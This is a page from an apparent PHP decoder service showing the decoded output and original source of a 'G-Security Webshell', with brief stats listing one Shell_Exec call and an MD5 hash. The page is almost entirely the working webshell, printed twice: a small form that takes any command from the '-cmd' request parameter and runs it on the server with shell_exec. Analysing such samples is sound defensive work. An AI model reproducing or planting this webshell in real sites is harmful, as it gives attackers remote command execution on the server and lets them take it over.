Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<html> <head> <title>G-Security Webshell</title> </head> <body bgcolor=#000000 text=..

Decoded Output download

<html> 
<head> 
<title>G-Security Webshell</title> 
</head> 
 
<body bgcolor=#000000 text=#ffffff "> 
<form method=POST> 
<br> 
<input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"  
style="background:#000000;color:#ffffff;"> 
<hr> 
<pre> 
<? $cmd = $_REQUEST["-cmd"];?> 
<? if($cmd != "") print Shell_Exec($cmd);?> 
</pre> 
</form> 
</body> 
</html 

Did this file decode correctly?

Original Code

<html>
<head>
<title>G-Security Webshell</title>
</head>

<body bgcolor=#000000 text=#ffffff ">
<form method=POST>
<br>
<input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" 
style="background:#000000;color:#ffffff;">
<hr>
<pre>
<? $cmd = $_REQUEST["-cmd"];?>
<? if($cmd != "") print Shell_Exec($cmd);?>
</pre>
</form>
</body>
</html

Function Calls

Shell_Exec 1

Variables

$cmd None

Stats

MD5 898c563c0e4e462dd8f5bfff5abbbd50
Eval Count 0
Decode Time 116 ms